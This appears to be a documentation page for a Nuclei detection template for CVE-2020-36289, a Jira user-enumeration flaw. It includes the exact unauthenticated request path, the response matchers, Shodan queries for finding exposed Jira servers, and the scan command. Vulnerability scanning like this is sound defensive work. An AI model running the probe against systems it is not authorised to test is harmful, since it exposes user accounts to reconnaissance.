Skip to content
Nuclei Templates

Jira Server and Data Center - Information Disclosure

ID: CVE-2020-36289

Severity: medium

Author: dhiyaneshDk

Tags: cve,cve2020,jira,atlassian,unauth

Description

Section titled “Description”

Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.

YAML Source

Section titled “YAML Source”
id: CVE-2020-36289


info:
  name: Jira Server and Data Center - Information Disclosure
  author: dhiyaneshDk
  severity: medium
  description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
  impact: |
    An attacker can gain access to sensitive information, potentially leading to further attacks.
  remediation: |
    Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.
  reference:
    - https://twitter.com/ptswarm/status/1402644004781633540
    - https://jira.atlassian.com/browse/JRASERVER-71559
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36289
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/StarCrossPortal/scalpel
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-36289
    cwe-id: CWE-863
    epss-score: 0.96974
    epss-percentile: 0.99732
    cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: atlassian
    product: data_center
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2020,jira,atlassian,unauth


http:
  - method: GET
    path:
      - '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
      - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'rel=\"admin\"'


      - type: word
        part: header
        words:
          - 'application/json'


      - type: status
        status:
          - 200
# digest: 4a0a004730450221009aeb7400d5e1a2d6660806d69f405a51985a47584aa8438b451da64d3f32893f0220248fdc7c59905b51fc01ddacaef4a4fbf5a7a0c82e5d2512dc43302b81d0435c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-36289.yaml"

View on Github